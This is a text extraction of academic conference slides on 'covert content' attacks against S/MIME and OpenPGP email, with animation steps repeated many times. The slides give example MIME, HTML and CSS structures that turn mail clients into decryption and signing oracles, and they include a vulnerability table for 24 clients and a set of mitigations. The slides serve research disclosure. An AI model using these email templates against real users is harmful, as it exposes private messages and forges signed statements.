Re: What’s up Johnny?Covert Content Attacks on Email End -To-End Encryption

Jens Müller, Marcus Brinkmann, Damian Poddebniak,Sebastian Schinzel, Jörg Schwenk

Remember EFAIL?

2

• Last year: EFAIL

Remember EFAIL?

2

• Last year: EFAIL– Major attack with a logo

Remember EFAIL?

2

• Last year: EFAIL– Major attack with a logo

– Novel attack techniques

targeting S/MIME + PGP

Remember EFAIL?

2

• Last year: EFAIL– Major attack with a logo

– Novel attack techniques

targeting S/MIME + PGP

• Today: non-crypto attacks

Remember EFAIL?

2

• Last year: EFAIL– Major attack with a logo

– Novel attack techniques

targeting S/MIME + PGP

• Today: non-crypto attacks– Targeting encryption and digital signatures

Remember EFAIL?

2

1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation

Overview

3

1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation

Overview

3

Technology's promise

4

I. “Strong crypto is virtually unbreakable.”

Technology's promise

4

I. “Strong crypto is virtually unbreakable.”II. “Digital signature will prevail. Math wins.”

Technology's promise

4

I. “Strong crypto is virtually unbreakable.”II. “Digital signature will prevail. Math wins.”

Technology's promise

…claims I. and II. could be bypassed witha single reply to a benign looking email?

What if…

4

From: alice@good.comTo: johnny@good.comSubject: Important news

Some ASCII text message…

Traditional RFC822 email

5

From: alice@good.comTo: johnny@good.comSubject: Important news

Some ASCII text message…

Traditional RFC822 email

5

From: alice@good.comTo: johnny@good.comSubject: Important news

Some ASCII text message…

Traditional RFC822 email

5

From: alice@good.comTo: johnny@good.comSubject: Important news

-----BEGIN PGP MESSAGE-----…-----END PGP MESSAGE-----

Traditional PGP/Inline

6

From: alice@good.comTo: johnny@good.comSubject: Important news

-----BEGIN PGP MESSAGE-----…-----END PGP MESSAGE-----

Traditional PGP/Inline

6

From: alice@good.comTo: johnny@good.comSubject: Important news

-----BEGIN PGP MESSAGE-----…-----END PGP MESSAGE-----

Traditional PGP/Inline

6

Multipart MIME email

7

Content-type: text/plain

Some ASCII text message…

Content-type: text/plain

This is the 2nd part

From: alice@good.comTo: johnny@good.comContent-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

Multipart MIME email

7

Content-type: text/plain

Some ASCII text message…

Content-type: text/plain

This is the 2nd part

From: alice@good.comTo: johnny@good.comContent-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

Multipart MIME email

7

Content-type: text/plain

Some ASCII text message…

Content-type: text/plain

This is the 2nd part

From: alice@good.comTo: johnny@good.comContent-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

Multipart MIME email

7

Content-type: text/plain

Some ASCII text message…

Content-type: text/plain

This is the 2nd part

From: alice@good.comTo: johnny@good.comContent-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

Multipart MIME email

7

Content-type: text/plain

Some ASCII text message…

Content-type: text/plain

This is the 2nd part

From: alice@good.comTo: johnny@good.comContent-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

Multipart MIME email

multipart/mixed

7

Content-type: text/plain

Some ASCII text message…

Content-type: text/plain

This is the 2nd part

From: alice@good.comTo: johnny@good.comContent-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

Multipart MIME email

multipart/mixed

texttext

7

From: alice@good.comTo: johnny@good.comContent-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

Content-type: text/html

<b>HTML</b> message…

Content-type: application/pdf

%PDF-1.4 […]

Multipart MIME email

multipart/mixed

pdfhtml

7

From: alice@good.comTo: johnny@good.comSubject: Important newsContent-Type: application/pkcs7-mime

MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…

S/MIME

8

From: alice@good.comTo: johnny@good.comSubject: Important newsContent-Type: application/pkcs7-mime

MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…

S/MIME

8

From: alice@good.comTo: johnny@good.comSubject: Important newsContent-Type: application/pkcs7-mime

MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…

S/MIME

8

OpenPGP (RFC 4880)• Favored by privacy advocates• Web-of-trust (no authorities)

S/MIME (RFC 5751)• Favored by organizations• Multi-root trust-hierarchies

Two competing standards

9

OpenPGP (RFC 4880)• Favored by privacy advocates• Web-of-trust (no authorities)

S/MIME (RFC 5751)• Favored by organizations• Multi-root trust-hierarchies

Two competing standards

9

1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation

Overview

10

1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation

Overview

10

Attacker model

11

• Eve has captured ciphertext

Attacker model

11

• Eve has captured ciphertext• Can modify email structure

Attacker model

11

• Eve has captured ciphertext• Can modify email structure • Can re-send it to the victim

Attacker model

11

• Eve has captured ciphertext• Can modify email structure • Can re-send it to the victim

– Either to recipient or sender

Attacker model

11

• Eve has captured ciphertext• Can modify email structure • Can re-send it to the victim

– Either to recipient or sender– Both can decrypt the email

Attacker model

11

Covert content attack: Decryption oracle

12

Covert content attack: Decryption oracle

12

Covert content attack: Decryption oracle

12

Covert content attack: Decryption oracle

12

To: johnny@good.com

Decryption oracle

From: alice@good.com

Content-Type: application/pkcs7-mime

MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…

13

To: johnny@good.com

Decryption oracle

From: alice@good.com

Content-Type: application/pkcs7-mime

MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…

13

To: johnny@good.com

Decryption oracle

From: eve@evil.com

Content-Type: application/pkcs7-mime

MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…

13

To: johnny@good.com

Decryption oracle

From: eve@evil.com

Content-Type: application/pkcs7-mime

MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…

13

To: johnny@good.com

Decryption oracle

From: eve@evil.com

Content-Type: application/pkcs7-mime

MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…

13

Content-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

To: johnny@good.com

Decryption oracle

From: eve@evil.com

Content-Type: application/pkcs7-mime

MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…

13

Content-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

To: johnny@good.com

Decryption oracle

From: eve@evil.com

Content-Type: application/pkcs7-mime

MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…

Content-type: text/plain

What's up Johnny?

13

Content-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

To: johnny@good.com

Decryption oracle

From: eve@evil.com

Content-Type: application/pkcs7-mime

MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…

Content-type: text/plain

What's up Johnny?

multipart/mixed

???text

13

Content-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

Content-type: text/plain

Secret message, for Johnny's eyes only…

To: johnny@good.com

Decryption oracle

From: eve@evil.com

Content-type: text/plain

What's up Johnny?

multipart/mixed

text secret

13

Content-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

Content-type: text/plain

Secret message, for Johnny's eyes only…

To: johnny@good.com

Decryption oracle

From: eve@evil.com

Content-type: text/plain

What's up Johnny?

13

Content-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

Content-type: text/plain

Secret message, for Johnny's eyes only…

To: johnny@good.com

Decryption oracle

From: eve@evil.com

Content-type: text/plain

What's up Johnny?

13

Content-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

Content-type: text/plain

Secret message, for Johnny's eyes only…

To: johnny@good.com

Decryption oracle

From: eve@evil.com

Content-type: text/plain

What's up Johnny?\n\n\n\n\n\n…

13

Content-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

Content-type: text/plain

Secret message, for Johnny's eyes only…

To: johnny@good.com

Decryption oracle

From: eve@evil.com

Content-type: text/plain

What's up Johnny?\n\n\n\n\n\n…

13

Content-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

Content-type: text/plain

Secret message, for Johnny's eyes only…

To: johnny@good.com

Decryption oracle

From: eve@evil.com

Content-type: text/html

What's up Johnny? <!--

13

Content-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

Content-type: text/plain

Secret message, for Johnny's eyes only…

To: johnny@good.com

Decryption oracle

From: eve@evil.com

Content-type: text/html

What's up Johnny? <!--

13

Content-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

Content-ID: <part2>

Secret message, for Johnny's eyes only…

To: johnny@good.com

Decryption oracle

From: eve@evil.com

Content-type: text/html

What's up Johnny? <img src="cid:part2">

13

Content-type: multipart/mixed; boundary="XXX"

--XXX

--XXX

--XXX--

Content-Disposition: attachment

Secret message, for Johnny's eyes only…

To: johnny@good.com

Decryption oracle

From: eve@evil.com

Content-type: text/plain

What's up Johnny?

13

1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation

Overview

14

1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation

Overview

14

Covert content attack: Signing oracle

15

Covert content attack: Signing oracle

15

Covert content attack: Signing oracle

15

Covert content attack: Signing oracle

15

Covert content attack: Signing oracle

15

From: eve@evil.comTo: johnny@good.comContent-type: text/html

What's up Johnny?I hereby declare war.

Signature oracle

16

Signature oracle

From: eve@evil.comTo: johnny@good.comContent-type: text/html

What's up Johnny?<div class="covert"> I hereby declare war. </div>

16

Signature oracle

From: eve@evil.comTo: johnny@good.comContent-type: text/html

<style>IF condition:Hide * but show .covert

</style>What's up Johnny?<div class="covert">I hereby declare war.</div>

16

Signature oracle

From: eve@evil.comTo: johnny@good.comContent-type: text/html

<style>@media (max-device-width: 834px) {.covert {visibility: hidden;}}

</style>What's up Johnny?<div class="covert">I hereby declare war.</div>

hide covertcontent on mobile devices

16

Signature oracle

From: eve@evil.comTo: johnny@good.comContent-type: text/html

<style>@media (max-device-width: 834px) {.covert {visibility: hidden;}}

@media (min-device-width: 835px) {* {visibility: hidden;}.covert {visibility: visible}}

</style>What's up Johnny?<div class="covert">I hereby declare war.</div>

but show on desktop devices

16

I'm fine, thanks.

On 01/05/19 09:53, Eve wrote:> What's up Johnny?

Re: What's up Johnny?

17

I'm fine, thanks.

On 01/05/19 09:53, Eve wrote:> What's up Johnny?

Re: What's up Johnny?

Reply email sent from Johnny’s mobile phone

17

I'm fine, thanks.

On 01/05/19 09:53, Eve wrote:> What's up Johnny?

Re: What's up Johnny?

Reply email sent from Johnny’s mobile phone

17

I'm fine, thanks.

On 01/05/19 09:53, Eve wrote:> What's up Johnny?

Re: What's up Johnny?

I hereby declare war.

Signed email received on a desktop device

Reply email sent from Johnny’s mobile phone

17

Conditional rules

18

• Targeting device type (@media)

Conditional rules

18

• Targeting device type (@media)• Targeting email client (@supports)

Conditional rules

18

• Targeting device type (@media)• Targeting email client (@supports)• Targeting user account (@document)

Conditional rules

18

• Targeting device type (@media)• Targeting email client (@supports)• Targeting user account (@document)

Conditional rules

18

1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation

Overview

19

1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation

Overview

19

OS ClientDecryption Signatures

S/MIME PGP S/MIME PGP

Windows

ThunderbirdOutlookWin. 10 MailWin Live MailThe Bat!PostboxeM Client

Linux

KMailEvolutionTrojitáClawsMutt

macOSApple MailMailMateAirmail

iOS Mail App

Android

K-9 MailR2Mail2MailDroidNine

Web

Exchange/OWARoundcubeHorde/IMPMailpile

● Plaintext can be completely hidden

◐ Plaintext merged with attacker-text

○ No vulnerabilities found

– Cryptosystem not available

Decryption oracles

● Covert rules kept in reply message

◐ Covert rules only for received mail

Signature oracles

20

OS ClientDecryption Signatures

S/MIME PGP S/MIME PGP

Windows

Thunderbird ●Outlook ○Win. 10 Mail ○Win Live Mail ○The Bat! ○Postbox ●eM Client ○

Linux

KMail ◐Evolution ◐Trojitá ◐Claws ◐Mutt ◐

macOSApple Mail ●MailMate ●Airmail ●

iOS Mail App ●

Android

K-9 Mail –R2Mail2 ○MailDroid ○Nine ○

Web

Exchange/OWA ○Roundcube –Horde/IMP ○Mailpile –

● Plaintext can be completely hidden

◐ Plaintext merged with attacker-text

○ No vulnerabilities found

– Cryptosystem not available

Decryption oracles

● Covert rules kept in reply message

◐ Covert rules only for received mail

Signature oracles

20

OS ClientDecryption Signatures

S/MIME PGP S/MIME PGP

Windows

Thunderbird ● ●Outlook ○ ○Win. 10 Mail ○ –Win Live Mail ○ –The Bat! ○ ○Postbox ● ●eM Client ○ ○

Linux

KMail ◐ ◐Evolution ◐ ◐Trojitá ◐ ◐Claws ◐ ◐Mutt ◐ ◐

macOSApple Mail ● ●MailMate ● ●Airmail ● ●

iOS Mail App ● –

Android

K-9 Mail – ○R2Mail2 ○ ●MailDroid ○ ○Nine ○ –

Web

Exchange/OWA ○ –Roundcube – ◐Horde/IMP ○ ○Mailpile – ○

● Plaintext can be completely hidden

◐ Plaintext merged with attacker-text

○ No vulnerabilities found

– Cryptosystem not available

Decryption oracles

● Covert rules kept in reply message

◐ Covert rules only for received mail

Signature oracles

20

OS ClientDecryption Signatures

S/MIME PGP S/MIME PGP

Windows

Thunderbird ● ● ●Outlook ○ ○ ◐Win. 10 Mail ○ – ◐Win Live Mail ○ – ●The Bat! ○ ○ ○Postbox ● ● ●eM Client ○ ○ ◐

Linux

KMail ◐ ◐ ○Evolution ◐ ◐ ◐Trojitá ◐ ◐ ◐Claws ◐ ◐ ○Mutt ◐ ◐ ○

macOSApple Mail ● ● ◐MailMate ● ● ●Airmail ● ● ●

iOS Mail App ● – ●

Android

K-9 Mail – ○ –R2Mail2 ○ ● ◐MailDroid ○ ○ ●Nine ○ – ●

Web

Exchange/OWA ○ – ●Roundcube – ◐ ◐Horde/IMP ○ ○ ◐Mailpile – ○ –

● Plaintext can be completely hidden

◐ Plaintext merged with attacker-text

○ No vulnerabilities found

– Cryptosystem not available

Decryption oracles

● Covert rules kept in reply message

◐ Covert rules only for received mail

Signature oracles

20

OS ClientDecryption Signatures

S/MIME PGP S/MIME PGP

Windows

Thunderbird ● ● ● ●Outlook ○ ○ ◐ ◐Win. 10 Mail ○ – ◐ –Win Live Mail ○ – ● –The Bat! ○ ○ ○ ○Postbox ● ● ● ●eM Client ○ ○ ◐ ◐

Linux

KMail ◐ ◐ ○ ○Evolution ◐ ◐ ◐ ◐Trojitá ◐ ◐ ◐ ◐Claws ◐ ◐ ○ ○Mutt ◐ ◐ ○ ○

macOSApple Mail ● ● ◐ ◐MailMate ● ● ● ●Airmail ● ● ● ●

iOS Mail App ● – ● –

Android

K-9 Mail – ○ – ●R2Mail2 ○ ● ◐ ◐MailDroid ○ ○ ● ●Nine ○ – ● –

Web

Exchange/OWA ○ – ● –Roundcube – ◐ ◐ ◐Horde/IMP ○ ○ ◐ ◐Mailpile – ○ – ○

● Plaintext can be completely hidden

◐ Plaintext merged with attacker-text

○ No vulnerabilities found

– Cryptosystem not available

Decryption oracles

● Covert rules kept in reply message

◐ Covert rules only for received mail

Signature oracles

20

OS ClientDecryption Signatures

S/MIME PGP S/MIME PGP

Windows

Thunderbird ● ● ● ●Outlook ○ ○ ◐ ◐Win. 10 Mail ○ – ◐ –Win Live Mail ○ – ● –The Bat! ○ ○ ○ ○Postbox ● ● ● ●eM Client ○ ○ ◐ ◐

Linux

KMail ◐ ◐ ○ ○Evolution ◐ ◐ ◐ ◐Trojitá ◐ ◐ ◐ ◐Claws ◐ ◐ ○ ○Mutt ◐ ◐ ○ ○

macOSApple Mail ● ● ◐ ◐MailMate ● ● ● ●Airmail ● ● ● ●

iOS Mail App ● – ● –

Android

K-9 Mail – ○ – ●R2Mail2 ○ ● ◐ ◐MailDroid ○ ○ ● ●Nine ○ – ● –

Web

Exchange/OWA ○ – ● –Roundcube – ◐ ◐ ◐Horde/IMP ○ ○ ◐ ◐Mailpile – ○ – ○

● Plaintext can be completely hidden

◐ Plaintext merged with attacker-text

○ No vulnerabilities found

– Cryptosystem not available

Decryption oracles

● Covert rules kept in reply message

◐ Covert rules only for received mail

Signature oracles

20

1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation

Overview

21

1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation

Overview

21

Decryption oracles

22

• Accepting ASCII text only

Decryption oracles

22

• Accepting ASCII text only

Decryption oracles

22

• Accepting ASCII text only• Enforcing digital signatures

Decryption oracles

22

• Accepting ASCII text only• Enforcing digital signatures

Decryption oracles

22

• Accepting ASCII text only• Enforcing digital signatures• Warn on partial encryption

Decryption oracles

22

• Accepting ASCII text only• Enforcing digital signatures• Warn on partial encryption

Decryption oracles

22

• Accepting ASCII text only• Enforcing digital signatures• Warn on partial encryption• All-or-Nothing Encryption

Decryption oracles

22

• Accepting ASCII text only• Enforcing digital signatures• Warn on partial encryption• All-or-Nothing Encryption

Decryption oracles

Root causes: long-term keys +ciphertext usage out-of-context

22

Signing oracles

23

• Dropping CSS Support

Signing oracles

23

• Dropping CSS Support

Signing oracles

23

• Dropping CSS Support• Only ASCII Text in replies

Signing oracles

23

• Dropping CSS Support• Only ASCII Text in replies• Remove styles from replies

Signing oracles

23

Conclusion

24

• Crypto is not enough, bypasses exist

Conclusion

24

• Crypto is not enough, bypasses exist• 22 of 24 tested clients are vulnerable

Conclusion

24

• Crypto is not enough, bypasses exist• 22 of 24 tested clients are vulnerable• Building security on top of email is hard

Conclusion

24

• Crypto is not enough, bypasses exist• 22 of 24 tested clients are vulnerable• Building security on top of email is hard

Conclusion

Thank you! Questions?Exploits: github.com/RUB-NDS/Covert-Content-Attacks

24

HTML and CSS support in various email clients

Proprietary conditional features

Blinding options